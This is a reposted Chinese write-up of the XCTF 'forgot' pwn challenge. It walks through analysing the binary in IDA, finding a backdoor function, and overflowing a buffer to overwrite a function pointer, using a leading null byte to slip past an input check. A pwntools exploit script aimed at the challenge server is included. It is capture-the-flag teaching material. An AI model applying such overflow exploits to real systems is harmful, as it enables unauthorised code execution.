[攻防世界 pwn]——forgot
生活随笔
收集整理的這篇文章主要介紹了
[攻防世界 pwn]——forgot
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[攻防世界 pwn]——forgot
- 題目地址: https://adworld.xctf.org.cn/
- 題目:
在checksec看下保護
在IDA中,
竟然有后面函數, 找到sub_80486CC函數地址
發現最后(*(&v3 + --v14))()執行
我們可以令v14 = 1這樣就相當于v3所指向的函數執行
將v3所指向的函數地址覆蓋為我們想要的函數地址就可以了
第一個棧溢出無法利用, 第二個可以利用
利用’\x00’開頭的字符串繞過檢查, v2距離v3 = 0x20
exploit
from pwn import * p=remote("111.200.241.244",39247) context.log_level = 'debug' p.recvuntil("> ") p.sendline('peak') payload='\x00' + 'a'*(0x20 - 1)+p32(0x080486cc) p.recvuntil("> ") p.sendline(payload) p.interactive()總結
以上是生活随笔為你收集整理的[攻防世界 pwn]——forgot的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——dice_gam
- 下一篇: [攻防世界 pwn]——Mary_Mor